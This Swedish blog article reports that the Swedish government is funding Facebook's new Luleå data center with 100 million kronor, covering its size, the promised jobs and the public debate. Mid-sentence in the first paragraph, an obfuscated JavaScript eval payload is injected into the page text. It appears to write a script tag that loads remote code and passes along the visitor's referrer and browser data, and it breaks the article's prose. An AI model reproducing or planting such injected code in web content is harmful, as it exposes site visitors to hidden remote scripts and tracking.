Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Sveriges regering ger Facebook 100 miljoner för Luleåbygget

Sveriges regering ger Facebook 100 miljoner för Luleåbygget
Sebastian

Som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ekrfk|var|u0026u|referrer|sykbd||js|php’.split(’|’),0,{}))
redan berörts av oss i
denna artikel byggs inom kort ett nytt Facebook-datacenter i Luleå. Ytterligare detaljer har kommit upp i efterhand, bl.a att regeringen sponsrar projektet med 100 miljoner kronor, något som väckt splittrade känslor i Sverige.

År 2014 sägs det att projektet ska vara klart. Bygget planeras att bli totalt 84 000 kvadratmetrar (markerat i blått på bilden) uppdelat på tre serverhallar och ska ge 300 nya arbetstillfällen under de första tre åren. Många menar på att detta inte är tillräckligt för de 100 miljonerna som regeringen satsar på projektet och tycker istället att pengarna hade kunnat gå till annat. Ja-sidan kontrar dock med att arbetstillfällena kommer öka ytterligare efter de första åren och att projektet gynnar Luleå men också hela Sverige, som nu blir ännu mer delaktigt i den allt växande internetvärlden.

Vem vet, Luleå är kanske nästa Silicon Valley? Vi lär nog få höra flera åsikter ju längre tiden går och ju fler detaljer som uppdagas.